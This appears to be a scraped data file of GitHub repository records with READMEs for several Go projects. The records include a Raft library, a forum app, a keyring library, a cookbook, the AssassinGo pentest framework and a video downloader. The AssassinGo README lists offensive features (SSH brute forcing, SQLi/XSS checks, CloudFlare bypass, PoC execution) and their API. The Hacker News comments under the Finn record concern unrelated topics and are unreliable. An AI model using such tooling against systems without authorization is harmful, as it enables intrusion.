operate.\n\n\nBuilt-in Raft Commands\n----------------------\nHere are a few commands for monitoring and managing the cluster:\n\n- **RAFTADDPEER addr** \nAdds a new member to the Raft cluster\n- **RAFTREMOVEPEER addr** \nRemoves an existing member\n- **RAFTPEERS addr** \nLists known peers and their status\n- **RAFTLEADER** \nReturns the Raft leader, if known\n- **RAFTSNAPSHOT** \nTriggers a snapshot operation\n- **RAFTSTATE** \nReturns the state of the node\n- **RAFTSTATS** \nReturns information and statistics for the node and cluster\n\nConsistency and Durability\n--------------------------\n\n### Write Durability\n\nThe `Options.Durability` field has the following options:\n\n- `Low` - fsync is managed by the operating system, less safe\n- `Medium` - fsync every second, fast and safer\n- `High` - fsync after every write, very durable, slower\n\n### Read Consistency\n\nThe `Options.Consistency` field has the following options:\n\n- `Low` - all nodes accept reads, small risk of [stale](http://stackoverflow.com/questions/1563319/what-is-stale-state) data\n- `Medium` - only the leader accepts reads, itty-bitty risk of stale data during a leadership change\n- `High` - only the leader accepts reads, the raft log index is incremented to guaranteeing no stale data\n\nFor example, setting the following options:\n\n```go\nopts := finn.Options{\n\tConsistency: High,\n\tDurability: High,\n}\nn, err := finn.Open(\"data\", \":7481\", \"\", &opts)\n```\n\nProvides the highest level of durability and consistency.\n\nLog Backends\n------------\nFinn supports the following log databases.\n\n- [FastLog](https://github.com/tidwall/raft-fastlog) - log is stored in memory and persists to disk, very fast reads and writes, log is limited to the amount of server memory.\n- [LevelDB](https://github.com/syndtr/goleveldb) - log is stored only to disk, supports large logs.\n- 
[Bolt](https://github.com/boltdb/bolt) - log is stored only to disk, supports large logs.\n\nContact\n-------\nJosh Baker [@tidwall](http://twitter.com/tidwall)\n\nLicense\n-------\nFinn source code is available under the MIT [License](/LICENSE).\n", "readme_type": "markdown", "hn_comments": "It's a bit challenging to find more details on Tidal's site. Their homepage is a livestream of an event, and there is no context on the page as to what the event is. Possibly their launch event?Watching the product video on the 'Explore Tidal' page makes me think of Spotify. They look to have complete feature parity with the only additional selling point being a higher quality audio stream. My initial reaction is, well...that is great if I had nice speakers, but my apple headphones certainly can't tell the difference.It's good to see other people competing with Spotify and I'm hopeful that Tidal can have better content curation than Spotify.I was at an astrobiology conference this week, and one of the ideas that we discussed is that life on Earth is good at finding and exploiting gradients for energy harvesting---thermal, chemical, even electrical. I'm not sure how to weight the whole \"the atmosphere will freeze out\" argument, but it does seem like having a constant, predictable thermal gradient, coupled with lower average high energy radiation (not much UV at sunset), should be conducive to life, all else being equal.I don't know enough about tides and atmospheres to say whether or not this sort of arrangement would be more conducive towards generating life.However, there's plenty of evidence that our rotating Earth gives a lot of benefits. There's the jet stream, which helps to spread moisture, there's the tides themselves, which helped create thriving transition zones between aquatic and terrestrial life (tide pools, etc.)I'm also thinking of Jared Diamond's Guns Germs and Steel. In our own case of planet Earth, we had pretty big geographic obstacles that both enabled and prevented the spread of certain forms of life (Deer can easily migrate within the larger temperate zones, enabling their species to spread easily. Viruses can't easily cross oceans, making it unlikely that they wipe out an entire species.)Tidal locking isn't always 1:1. Mercury, the lone tidally locked planet in our Solar System, is locked at a 3:2 resonance. For simple thermodynamic reasons one would expect that in most cases the planets locked at an \"offset\" ratio are far more likely to be habitable than the ones locked at 1:1. This happens when there are outlying large planets that disrupt the orbit:http://en.wikipedia.org/wiki/Mercury_%28planet%29#Spin.E2.80...I wonder if the earth would be tidally locked without having bumped into the moon at some point.Aside from the obvious problems with keeping an atmosphere, can tidally locked planets have a magnetosphere?\"Tidally locked\"There, was that so hard? Extraordinary effort here to coin a neologism for something that's already an established phrase.This is also a blogpost promoting a paper about cloud formation in tidally locked planets, which it appears someone forgot to link, inside the phrase \"Gory details here\".Someone already calculated in 1950 that such planet is very unlikely to have an atmosphere. 
Temperature difference is about 300 degrees celsius and most gasses would either froze on cold side, or escape to space on warm side.In best cases you get permanent hurricane (Venus)A couple problems - when there's even a tiny wobble the goldilocks zone will alternate from extreme freezing to extreme heat. The other problem is that the atmosphere will eventually fully condense on the cold side of the planet.I imagine Game of Thrones is set on such a planet :)The whole time I was reading this was \"selection bias\".> The easiest planets to find are those that orbit close to their stars.> Tides drive the planet\u2019s obliquity to zero, meaning that the planet\u2019s equator is perfectly aligned with its orbit. The planet will also be \u201ctidally locked\u201dSeems likely that the first planets we'll find life on are the planets that are easy to find.I'm surprised that tidal locking happen for a planet with liquids on the surface, except in a jury-rigged toy scenario. I'd expect that the energy would cause fluid/molden volumes to circulate. This would create motion relative to the energy source.It might be possible to use this same kind of circulation effect to have a self-contained space-craft. It would consume solar energy, and then strategically pump volumes of fluid from one end to the other, to deliberately change its momentum.http://www.wired.com/thisdayintech/2010/05/0526bill-gates-in...Pretty interesting how accurate his predictions were, in everything from internet domination, the death of services like AOL, free ad-funded content, P2P, and search.Possibly more interesting that Microsoft failed to really capitalize on almost all of them.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "disintegration/bebop", "link": "https://github.com/disintegration/bebop", "tags": ["forum", "discussion-board", "web-app", "rest-api", "vuejs", "golang"], "stars": 545, "description": "Bebop is a simple discussion board / forum web application", "lang": "Go", "repo_lang": "", "readme": "# Bebop\n\nBebop is a simple discussion board / forum web application.\n\n## Features\n\n- REST API backend written in Go\n- Vue.js-based frontend\n- Two databases are supported: \n - PostgreSQL\n - MySQL\n- Three file-storage backends are supported to store user-uploaded files (e.g. avatars):\n - Local filesystem\n - Google Cloud Storage\n - Amazon S3\n- Social login (OAuth 2.0) via three providers:\n - Google\n - Facebook\n - Github\n- JSON Web Tokens (JWT) are used for user authentication in the API\n- Single binary deploy. All the static assets (frontend JavaScript & CSS files) are embedded into the binary\n- Markdown comments\n- Avatar upload, including animated GIFs. Auto-generated letter-avatars on user creation\n\n## Getting Started\n\n * Create a new empty database (MySQL \u043er PostgreSQL) that will be used as a data store and a database user with all privileges granted on this database.\n\n * Obtain OAuth 2.0 credentials (client_id and secret) from at least one of the providers (Google, Facebook, Github) so users can log into the web application. The OAuth callback url will be `/oauth/end/`. The `` is where the bebop web app will be mounted on your site and the `` is the lowercase provider name. 
For example, if base_url is `https://my.website.com/forum/`, then the oauth callback url for google will be `https://my.website.com/forum/oauth/end/google`.\n\n * Download and compile the bebop binary:\n ```\n $ go get -u github.com/disintegration/bebop/cmd/bebop\n ```\n\n * Inside an empty directory run:\n ```\n $ bebop init\n ```\n This will generate an initial configuration file \"bebop.conf\" inside the current dir.\n Edit the configuration file to set the server listen address, the base url, the database and file storage parameters, OAuth credentials, etc.\n\n * Run the following command to start the bebop web server.\n ```\n $ bebop start\n ```\n\n * Sign in into your web application using one of the social login providers.\n Then run the following command to grant admin privileges to your user.\n ```\n $ bebop add-admin \n ```\n\n## Screenshots\n\n### Topics\n\n![Topics](screenshot-topics.png)\n\n### Comments\n\n![Comments](screenshot-comments.png)", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "zalando/go-keyring", "link": "https://github.com/zalando/go-keyring", "tags": ["golang", "dbus", "secret", "keyring", "utilities", "authentication"], "stars": 544, "description": "Cross-platform keyring interface for Go", "lang": "Go", "repo_lang": "", "readme": "# Go Keyring library\n[![Build Status](https://travis-ci.org/zalando/go-keyring.svg?branch=master)](https://travis-ci.org/zalando/go-keyring)\n[![Build status](https://ci.appveyor.com/api/projects/status/l8hdbqng769sc2c5/branch/master?svg=true)](https://ci.appveyor.com/project/mikkeloscar/go-keyring/branch/master)\n[![Go Report Card](https://goreportcard.com/badge/github.com/zalando/go-keyring)](https://goreportcard.com/report/github.com/zalando/go-keyring)\n[![GoDoc](https://godoc.org/github.com/zalando/go-keyring?status.svg)](https://godoc.org/github.com/zalando/go-keyring)\n\n`go-keyring` is an OS-agnostic library for *setting*, *getting* and *deleting*\nsecrets from the system keyring. It supports **OS X**, **Linux/BSD (dbus)** and\n**Windows**.\n\ngo-keyring was created after its authors searched for, but couldn't find, a better alternative. It aims to simplify\nusing statically linked binaries, which is cumbersome when relying on C bindings (as other keyring libraries do).\n\n#### Potential Uses\n\nIf you're working with an application that needs to store user credentials\nlocally on the user's machine, go-keyring might come in handy. For instance, if you are writing a CLI for an API\nthat requires a username and password, you can store this information in the\nkeyring instead of having the user type it on every invocation.\n\n## Dependencies\n\n#### OS X\n\nThe OS X implementation depends on the `/usr/bin/security` binary for\ninterfacing with the OS X keychain. It should be available by default.\n\n#### Linux and *BSD\n\nThe Linux and *BSD implementation depends on the [Secret Service][SecretService] dbus\ninterface, which is provided by [GNOME Keyring](https://wiki.gnome.org/Projects/GnomeKeyring).\n\nIt's expected that the default collection `login` exists in the keyring, because\nit's the default in most distros. 
If it doesn't exist, you can create it through the\nkeyring frontend program [Seahorse](https://wiki.gnome.org/Apps/Seahorse):\n\n * Open `seahorse`\n * Go to **File > New > Password Keyring**\n * Click **Continue**\n * When asked for a name, use: **login**\n\n## Example Usage\n\nHow to *set* and *get* a secret from the keyring:\n\n```go\npackage main\n\nimport (\n \"log\"\n\n \"github.com/zalando/go-keyring\"\n)\n\nfunc main() {\n service := \"my-app\"\n user := \"anon\"\n password := \"secret\"\n\n // set password\n err := keyring.Set(service, user, password)\n if err != nil {\n log.Fatal(err)\n }\n\n // get password\n secret, err := keyring.Get(service, user)\n if err != nil {\n log.Fatal(err)\n }\n\n log.Println(secret)\n}\n\n```\n\n## Tests\n### Running tests\nRunning the tests is simple:\n\n```\ngo test\n```\n\nWhich OS you use *does* matter. If you're using **Linux** or **BSD**, it will\ntest the implementation in `keyring_unix.go`. If running the tests\non **OS X**, it will test the implementation in `keyring_darwin.go`.\n\n### Mocking\nIf you need to mock the keyring behavior for testing on systems without a keyring implementation you can call `MockInit()` which will replace the OS defined provider with an in-memory one.\n\n```go\npackage implementation\n\nimport (\n \"testing\"\n\n \"github.com/zalando/go-keyring\"\n)\n\nfunc TestMockedSetGet(t *testing.T) {\n keyring.MockInit()\n err := keyring.Set(\"service\", \"user\", \"password\")\n if err != nil {\n t.Fatal(err)\n }\n\n p, err := keyring.Get(\"service\", \"user\")\n if err != nil {\n t.Fatal(err)\n }\n\n if p != \"password\" {\n t.Error(\"password was not the expected string\")\n }\n\n}\n\n```\n\n## Contributing/TODO\n\nWe welcome contributions from the community; please use [CONTRIBUTING.md](CONTRIBUTING.md) as your guidelines for getting started. Here are some items that we'd love help with:\n\n- The code base\n- Better test coverage\n\nPlease use GitHub issues as the starting point for contributions, new ideas and/or bug reports.\n\n## Contact\n\n* E-Mail: team-teapot@zalando.de\n* Security issues: Please send an email to the [maintainers](MAINTAINERS), and we'll try to get back to you within two workdays. If you don't hear back, send an email to team-teapot@zalando.de and someone will respond within five days max.\n\n## Contributors\n\nThanks to:\n\n- [your name here]\n\n## License\n\nSee [LICENSE](LICENSE) file.\n\n\n[SecretService]: https://specifications.freedesktop.org/secret-service/latest/\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "kevinyan815/gocookbook", "link": "https://github.com/kevinyan815/gocookbook", "tags": [], "stars": 544, "description": "go cook book", "lang": "Go", "repo_lang": "", "readme": "# Golang Development Notes\n\n\nUse the Go language for development, sort out some common cases in this Repository, and plan to slowly accumulate it as a CookBook for future development.\n\nThe code samples corresponding to all knowledge points in the warehouse can run normally, and there will be no problem in directly applying them to production projects. Because the purpose is to accumulate the desk books of Go language development, so I don\u2019t talk about source code analysis and the like. 
If you want to know more about the various internal principles of Go language and source code interpretation, please follow my official account **\"Network Management \u53e3bi Nao\"**, in addition to the application, a lot of principle analysis will be used there.\n\n![#\u516c\u5171\u53f7\uff1a\u7f51\u7edc\u5411bi\u5411](https://cdn.learnku.com/uploads/images/202109/24/6964/ZXgD1fAlOU.png!large)\n\n\n## Table of contents\n- Early preparation\n - [Environment installation](https://github.com/kevinyan815/gocookbook/issues/74)\n - [Basic Grammar](https://github.com/kevinyan815/gocookbook/blob/master/lang-basic/README.md)\n- initialization\n - [Execution sequence of Go application initialization work](https://github.com/kevinyan815/gocookbook/issues/24)\n - [Six features of Go language init function](https://mp.weixin.qq.com/s/P-BhuQy1Vd3lxlYgClDAJA)\n\n- Project\n - [Dependency management tool GOMODULE](https://mp.weixin.qq.com/s/xtvTUl2IZFQ79dSR_m-b7A)\n - [GoModules manages private dependent modules](https://mp.weixin.qq.com/s/8E1PwnglrS18hZsUEvE-Qw)\n - [Version management of Go Modules dependencies](https://mp.weixin.qq.com/s/ptJK7CDHCr6P4JCdsUXKdg)\n - [Common Coding Specifications](https://github.com/kevinyan815/gocookbook/issues/61)\n - [How to implement enumeration in Go](https://github.com/kevinyan815/gocookbook/issues/73)\n- string\n - [See through Go language strings](https://github.com/kevinyan815/gocookbook/issues/40)\n - [Operating Chinese strings](https://github.com/kevinyan815/gocookbook/issues/11)\n - [Common string operations](https://yourbasic.org/golang/string-functions-reference-cheat-sheet/)\n - [Mutual conversion between string, int, int64 types](https://yourbasic.org/golang/convert-int-to-string/)\n - [High performance string concatenation](https://github.com/kevinyan815/gocookbook/issues/68)\n- array\n - [Array upper limit derivation and out-of-bounds check](https://github.com/kevinyan815/gocookbook/issues/37)\n- Slice\n - [declaration and initialization](https://github.com/kevinyan815/gocookbook/issues/3)\n - [Append and remove elements](https://github.com/kevinyan815/gocookbook/issues/4)\n - [Filter duplicate elements](https://github.com/kevinyan815/gocookbook/issues/5)\n - [Sorting structure slices](https://github.com/kevinyan815/gocookbook/issues/12)\n - [Slices are not reference types](https://github.com/kevinyan815/gocookbook/issues/38)\n - [A few pitfalls to pay attention to when using slices](https://mp.weixin.qq.com/s/ISLNTCo7Jr9XnqAEhDuYcw)\n-Map\n - [(General Concept) Hash Table Design Principle](https://github.com/kevinyan815/gocookbook/issues/39)\n - [declaration and initialization](https://github.com/kevinyan815/gocookbook/issues/6)\n - [Do not write key values \u200b\u200bto nil map](https://github.com/kevinyan815/gocookbook/issues/7)\n - [Modify map](https://github.com/kevinyan815/gocookbook/issues/8)\n - [traverse map](https://github.com/kevinyan815/gocookbook/issues/15)\n - [make and new](https://github.com/kevinyan815/gocookbook/issues/53)\n - [Will the Map parameter of the Go function point to different underlying memory after expansion?](https://mp.weixin.qq.com/s/WfzeNWV1j0fSXUiVOLe5jw)\n- read and write data\n - [Encoding JSON](https://github.com/kevinyan815/gocookbook/issues/2)\n - [Decoding JSON](https://github.com/kevinyan815/gocookbook/issues/1)\n - [Read file line by line](https://github.com/kevinyan815/gocookbook/issues/13)\n - [Summary of how to use the Go language IO library (which library should be used for IO 
operations)](https://github.com/kevinyan815/gocookbook/issues/62)\n - [Byte order: big endian and little endian](https://mp.weixin.qq.com/s/ri2tt4nvEJub-wEsh0WPPA)\n - [Use Golang to read and write HTTP requests (with Options design pattern implementation)](https://github.com/kevinyan815/gocookbook/issues/64)\n- Directory and file operations\n - [Go Language File Operation Encyclopedia](https://mp.weixin.qq.com/s/dQUEq0lJekEUH4CHEMwANw)\n - [Add meal version--practical directory and file operations](https://github.com/kevinyan815/gocookbook/issues/84)\n \n- pointer\n - [Usage and usage restrictions](https://github.com/kevinyan815/gocookbook/issues/41)\n - [uintptr and unsafer.Pointer](https://github.com/kevinyan815/gocookbook/issues/42)\n - [Extended reading: memory alignment](https://github.com/kevinyan815/gocookbook/issues/43)\n- interface\n - [Know the interface of Go](https://github.com/kevinyan815/gocookbook/issues/45)\n - [Types and method receivers of Go interfaces](https://github.com/kevinyan815/gocookbook/issues/46)\n - [Type conversion and assertion of interface](https://github.com/kevinyan815/gocookbook/issues/47)\n - [Dynamic dispatch when interface is called](https://github.com/kevinyan815/gocookbook/issues/67)\n- [Range iteration](https://github.com/kevinyan815/gocookbook/issues/15)\n- function\n - [Calling conventions and parameter passing](https://github.com/kevinyan815/gocookbook/issues/44)\n - [Usage and behavior analysis of defer](https://github.com/kevinyan815/gocookbook/issues/51)\n - [panic and recover](https://github.com/kevinyan815/gocookbook/issues/52)\n\n- error handling\n - [Some suggestions on error handling in Golang](https://github.com/kevinyan815/gocookbook/issues/66)\n - [Go code more elegant error handling](https://github.com/kevinyan815/gocookbook/issues/82)\n - [Packaging errors and related interfaces after Go 1.13](https://mp.weixin.qq.com/s/SFbSAGwQgQBVWpySYF-rkw)\n- Bag\n - [Internal package](https://github.com/kevinyan815/gocookbook/issues/58)\n- standard library\n - [Regular tableDa formula](https://github.com/kevinyan815/gocookbook/issues/9)\n - [Time common basic operations](https://github.com/kevinyan815/gocookbook/issues/14)\n - [Time zone and time calculation operation summary of Time](https://github.com/kevinyan815/gocookbook/issues/85)\n- database access\n - [Use the standard library database/sql to access the database](https://mp.weixin.qq.com/s/bhsFCXTZ_TBP0EvyRM-bdA)\n - [Use the ORM library gorm to access the database](https://mp.weixin.qq.com/s/N-ZAgRrEu2FJBlApIhuVsg)\n - [GORM Guide](https://gorm.io/zh_CN/docs/index.html)\n- System programming\n - [command line flag](https://github.com/kevinyan815/gocookbook/issues/36)\n - [Monitoring system signal](https://github.com/kevinyan815/gocookbook/issues/55)\n- Concurrent programming\n - [Context](https://github.com/kevinyan815/gocookbook/issues/50)\n - [Context usage example](https://github.com/kevinyan815/gocookbook/issues/50)\n - [Illustrated Context Principle](https://mp.weixin.qq.com/s/NNYyBLOO949ElFriLVRWiA)\n - [Context source code learning](https://mp.weixin.qq.com/s/SJna8UAoV9GTGCuRezC9Qw)\n - [Channel basic concepts and usage](https://github.com/kevinyan815/gocookbook/issues/54)\n - [Coordinated waiting with WaitGroup](https://github.com/kevinyan815/gocookbook/issues/34)\n - [ErrorGroup takes into account cooperative waiting and error delivery](https://github.com/kevinyan815/gocookbook/issues/35)\n - [Correct posture for Reset 
timer](https://github.com/kevinyan815/gocookbook/issues/17)\n - [An example combining cancelCtx, Timer, Goroutine, Channel](https://github.com/kevinyan815/gocookbook/issues/18)\n - [Using WaitGroup, Channel and Context to create a concurrent user tag queryer](https://github.com/kevinyan815/gocookbook/issues/21)\n - [Implement a limited-capacity queue using sync.Cond](https://github.com/kevinyan815/gocookbook/issues/22)\n - [Using semaphores to control concurrent access to limited resources](https://github.com/kevinyan815/gocookbook/issues/30)\n - [Using Chan to extend the functionality of mutexes](https://github.com/kevinyan815/gocookbook/issues/25)\n - [merge duplicate requests with SingleFlight](https://github.com/kevinyan815/gocookbook/issues/31)\n - [CyclicBarrier Cyclic Barrier](https://github.com/kevinyan815/gocookbook/issues/32)\n - [Detailed usage of atomic operations](https://github.com/kevinyan815/gocookbook/issues/65)\n- reflection\n - [Go reflection tutorial](https://github.com/kevinyan815/gocookbook/issues/69)\n - [The most common application of reflection -- structure tag] (https://github.com/kevinyan815/gocookbook/issues/70)\n- Record of Online Problem Solving\n - [Redirect runtime panic to log file](https://github.com/kevinyan815/gocookbook/issues/19)\n - [Use Go's cross-compilation and conditional compilation to make your own software package run on multiple platforms](https://github.com/kevinyan815/gocookbook/issues/20)\n - [How to set GOMAXPRCS in the container](https://github.com/kevinyan815/gocookbook/issues/57)\n - [Several methods to prevent concurrency from destroying friendly forces](https://github.com/kevinyan815/gocookbook/issues/63)\n- Compilation principle\n - [Compilation principle of Go program](https://github.com/kevinyan815/gocookbook/issues/56)\n- Some interesting little programs\n - [A simple probability draw tool](https://github.com/kevinyan815/gocookbook/issues/23)\n - [Current Limiting Algorithm Counter](https://github.com/kevinyan815/gocookbook/issues/29)\n - [Sliding window of current limiting algorithm](https://github.com/kevinyan815/gocookbook/issues/26)\n - [Leaky Bucket of Current Limiting Algorithm](https://github.com/kevinyan815/gocookbook/issues/28)\n - [Token Bucket of Current Limiting Algorithm](https://github.com/kevinyan815/gocookbook/issues/27)\n - [Concurrent interesting question--H2O manufacturing factory](https://github.com/kevinyan815/gocookbook/issues/33)\n - [Self-explainable Token generation algorithm](https://github.com/kevinyan815/gocookbook/blob/master/codes/gen_token/main.go)\n - [Algorithm for generating traceid and spanid for distributed link tracking](https://github.com/kevinyan815/gocookbook/blob/master/codes/trace_span/main.go)\n - [An HTTP client with blocking rate limiter](https://github.com/kevinyan815/gocookbook/blob/master/codes/http_client_with_rate/http_rl_client.go)\n - [AES encryption and decryption, HMAC signature verification](https://github.com/kevinyan815/gocookbook/blob/master/codes/crypto_utils/aes.go)\n- gRPC application practice\n - [interceptor interceptor --gRPC Middleware](https://github.com/kevinyan815/gocookbook/issues/60)\n- Go Service Governance\n - [Let the Go process monitor its own resource usage](https://github.com/kevinyan815/gocookbook/issues/71)\n - [Scheme design ideas for automatic sampling performance analysis of Go services] (https://github.com/kevinyan815/gocookbook/issues/72)\n - [From Go log library to Zap, how to create a useful and practical 
Logger](https://mp.weixin.qq.com/s/Jh2iFY5uGe0qCFdKZWjotA)\n - [How to connect the logs of distributed services] (https://mp.weixin.qq.com/s/M2jNnLkYaearwyRERnt0tA)\n- Go unit test clearance guide\n - [go test toolset and table tests](https://github.com/kevinyan815/gocookbook/issues/75)\n - [Simulate network requests and interface calls](https://github.com/kevinyan815/gocookbook/issues/76)\n - [Mock test for native database query](https://github.com/kevinyan815/gocookbook/issues/77)\n - [Mock test of database ORM](https://github.com/kevinyan815/gocookbook/issues/80)\n - [Mock interface implementation and interface piling](https://github.com/kevinyan815/gocookbook/issues/78)\n - [Introduction to the use of the all-round piling tool Go Monkey](https://github.com/kevinyan815/gocookbook/issues/79)\n - [How to write testable code](https://github.com/kevinyan815/gocookbook/issues/81)\n - [Use unit tests to discover hidden dangers of coroutine leaks](https://mp.weixin.qq.com/s/XrhdU95CswLGwS0CLxqZmg)\n - [Go 1.18 fuzzing tutorial](https://mp.weixin.qq.com/s/7I0zB_AsltzDLmc9ew48Bg)", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "AmyangXYZ/AssassinGo", "link": "https://github.com/AmyangXYZ/AssassinGo", "tags": [], "stars": 544, "description": "An extensible and concurrency pentest framework in Go, also with WebGUI. Feel free to CONTRIBUTE!", "lang": "Go", "repo_lang": "", "readme": "![](./logo.jpg)\n\n[![Rawsec's CyberSecurity Inventory](https://inventory.raw.pm/img/badges/Rawsec-inventoried-FF5050_flat.svg)](https://inventory.raw.pm/tools.html#AssassinGo)\n[![MIT License](https://img.shields.io/badge/license-MIT-blue.svg?style=flat)](http://choosealicense.com/licenses/mit/)\n\n# AssassinGo\n\nAssassinGo is an extensible and concurrency information gathering and vulnerability scanning framework, with WebSocket based [Web GUI](https://github.com/U1in/AssassinGo-Front-End).\n\nJust for learn, welcome PR.\n\n## Features\n\n- [x] Retrieve Security Headers\n- [x] Bypass CloudFlare\n- [x] Detect CMS Version\n- [x] Honeypot Detect\n- [x] Port Scan\n- [x] Trace Route and Mark on Google Map\n- [x] Subdomain Scan\n- [x] Dir Scan and Site Map\n- [x] Whois Lookup\n- [x] Crawl the Paramed URLs\n- [x] Basic SQLi Check\n- [x] Basic XSS Check\n- [x] Intruder\n- [x] SSH Bruter\n- [x] Google-Hacking with Headless-Chrome\n- [x] Friendly PoC Interface\n- [x] Web GUI(using WebSocket)\n- [ ] Generate Report\n\n## Installation\n\n### localhost\n\n```bash\ngit clone https://github.com/AmyangXYZ/AssassinGo\ncd AssassinGo\ndocker-compose up --build -d\ncat backup.sql | docker exec -i assassingo_mariadb_1 /usr/bin/mysql -uag --password=password ag\n```\n\nThen visit http://127.0.0.1:8000 and login as admin:admin\n\n### VPS\n\nIf you want to deploy on your VPS, please clone the [Frontend](https://github.com/U1in/AssassinGo-Front-End) and modify the `base_url` of AJAX and WebSocket, then run `npm run build` and copy the output to `web/` directory as [deploy.sh](./deploy.sh) says.\n\nRemember to add your google-map key in `index.html`.\n\n## Demo\n\n![base](demo/demo1.png)\n\n![traceroute](demo/demo2.png)\n\n![subdomain](demo/demo6.png)\n\n![intruder](demo/demo9.png)\n\n![seek](demo/demo8.png)\n\n![poc](demo/demo3.png)\n\n## Outline Design\n\nI choose **Composite Pattern** to increase expansibility.\n\n![design-pattern](./design-pattern.png)\n\n## API\n\n### AJAX\n\nPath | Method | Func | Params | Return\n----- | ----- | ----- | ----- | 
-----\n/token | POST | sign in | username=admin&password=adminn | {SG_Token:\"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE1M\u2026W4ifQ.qY-k5f54CrQ6_dNdjgQgqjh5xS8iFZOjTLcfMfirY0w\" (stored in cookie)}\n/api/target | POST | set a target | target=xxx OR targets=t1,t2... | nil\n/api/info/basic | GET | get ip and retrieve security headers | nil | {data:{\"ip\": \"192.168.1.1\", \"webserver\": \"nginx\",\"click_jacking_protection\":true,\"content_security_policy\":false,\"strict_transport_security\":false,\"x_content_type_options\":true}\n/api/info/bypasscf | GET | find real ip behind cloudflare | nil | {\"real_ip\":\"123.123.123.123\"}\n/api/info/cms | GET | detect cms | nil | {data:{\"cms\": \"wordpress\"}}\n/api/info/honeypot | GET | get ip and webserver | nil | {data:{\"score\": \"0.3\"}}\n/api/info/whois | GET | whois | nil | {data:{\"domain\":\"example.com\",\"registrar_name\":\"alibaba\", \"admin_name\":\"xiaoming\", \"admin_email\":\"a@qq.com\", \"admin_phone\":\"+86.12312345678\", \"created_date\":\"2016-07-28T12:57:53.0Z\",\"expiration_date\":\"2018-07-28T12:57:53.0Z\", \"ns\":\"dns9.hichina.com\", \"state\":\"clienttransferprohibited\"}}\n/api/poc | GET | get poc list | nil | {data:{\"poc_list\":[\"drupal-rce\":{\"id\":\"CVE-2017-7602\",\"ty## pe\":\"remote code execution\",\"text\":\"biubiubiu\",\"platform## \":\"php\",\"data\":\"2018-04-25\",## \"reference\":\"https://cve.mitre.org/cgi-## bin/cvename.cgi?name=CVE-2018-7602\"},\"seacms-v654-rce\"]## }}\n/api/poc/:poc | GET | run the specified poc | nil | {data:{\"host\": \"example.com\", \"exploitable\":\"true\"}}\n\n### WebSocket\n\nPath | Func | Params | Return\n----- | ----- | ----- | -----\n/ws/info/port | port scan | nil | {\"port\": \"80\", \"service\": \"http\"}\n/ws/info/tracert | trace route and mark on google map | nil | {\"ttl\": 1, \"addr\": 192.168.1.1, \"elapsed_time\": 22720440, \"country\": China, \"lat\": 34.2583,\"long\": 116.1614}\n/ws/info/subdomain | enmu subdomain | nil | {\"subdomain\":\"earth.google.com\"}\n/ws/info/dirb | brute force dir | {\"concurrency\":20, \"dict\":\"php\"}; {\"stop\":1} | {\"path\": \"admin.php\", \"resp_status\": 200, \"resp_len\": 110}\n/ws/attack/crawl | crawl paramed urls | {\"max_depth\": 4} | {\"url\": \"example.com/?id=1\"}\n/ws/attack/sqli | check sqli | nil | {\"sqli_url\": \"example.com/?id=1}\n/ws/attack/xss | check xss | nil | {\"xss_url\": \"example.com/?id=1}\n/ws/attack/intrude | brute force | {\"header\": \"GET / HTTP/1.1 ...\", \"payload\": \"p1,p2...\", \"concurrency\": \"10\"}; {\"stop\":1}| {\"payload\": 1, \"resp_status\": 200, \"resp_len\": 110}\n/ws/attack/ssh | brute force ssh | {\"port\":\"22\",, \"concurrency\":40} | {\"user\":\"root\",\"passwd\":\"biubiubiu\"}\n/ws/seek | seek targets | {\"query\": \"biu\", \"se\": \"bing/google\", \"max_page\": 10} | {\"urls\": urls}\n/ws/poc/:poc | run poc | {concurrency:10} | {\"exploitable_host\": \"example.com\"}\n\n## License\n\nMIT\n", "readme_type": "text", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "sodaling/FastestBilibiliDownloader", "link": "https://github.com/sodaling/FastestBilibiliDownloader", "tags": ["bilibili", "video-downloader"], "stars": 544, "description": "B\u7ad9\u89c6\u9891\u6781\u901f\u6279\u91cf\u4e0b\u8f7d\u5668|The fastest Bilibili video downloader", "lang": "Go", "repo_lang": "", "readme": "# FastestBibiliDownloader\n\n## Original project address: **[ 
FastestBilibiliDownloader](https://github.com/sodaling/FastestBilibiliDownloader)**\n\n> The project is only for learning and communication, please do not use it for any commercial purposes!\n\n## \u2b50 Added\n\nAutomatically parse **want to download video URL / UP main personal homepage URL**, support:\n\n- [x] [https://www.bilibili.com/video/**old av number**/](#), the av number is a string of numbers starting with `av`**\n- [x] [https://www.bilibili.com/video/**New version of BV number**/](#), BV number is a string of characters starting with `BV`**\n- [x] [https://space.bilibili.com/**UP master\u2019s ID**/](#), the UP master\u2019s ID is **a string of numbers**\n\n![demo.png](demo.png)\n\n## \u26a0Compared to the deletion of the original project\n\n+ Because FFmeg splicing and conversion takes too long, the function in `video merge` has been removed. The downloaded video is in `.flv` format.\n\n-----\n\n## \ud83d\udc4dOriginal project description\n\n**The second fastest Bilibili.com (B station) video downloader in the Eastern Hemisphere! **\n\nIf you want to download all the videos of a certain up master at station b, and you want to download fast, then you can try this project-.-\n\nThere are currently two (three) video download options available:\n\n1. Download a single video through the aid of the video.\n2. Through the upid of the up master (B station is called mid), download all the videos contributed by the up master.\n3. Download a single video through the BVid of the video. **(new)**\n\n\n> Features:\n>\n> There are already a lot of video codes downloaded from station b on Github. So what are the characteristics of this downloader?\n>\n> Because this is written in Golang, of course, it also uses the characteristics of Golang: goroutine.\n>\n> Simply put, the features are:\n>\n> **FAST! FAST! The more videos you download, the faster! **\n>\n> * When a single aid video is divided into several parts, or when you choose to download all videos under the up master, multiple videos will be downloaded in parallel at the same time, and it is definitely not a problem to run up to your network speed.\n> * Downloading and merging videos are processed in parallel. If the video is divided into multiple parts, they will be merged immediately when the download is completed. The video merging process and other downloading and merging are performed at the same time and do not affect each other.\n\n### run\n\nThe downloaded temporary videos will be stored in the **download** folder under the running path, and each video (aid) has a folder, with **aid_video title** as the folder name.\nThe final video will be stored in the **output** folder under the running path, one folder for each aid, with **video title** as the folder name.\n```shell\ngo run cmd/start-concurrent-engine.go -h # get parameters\n```\n\n\n\n#### Use the Golang compilation 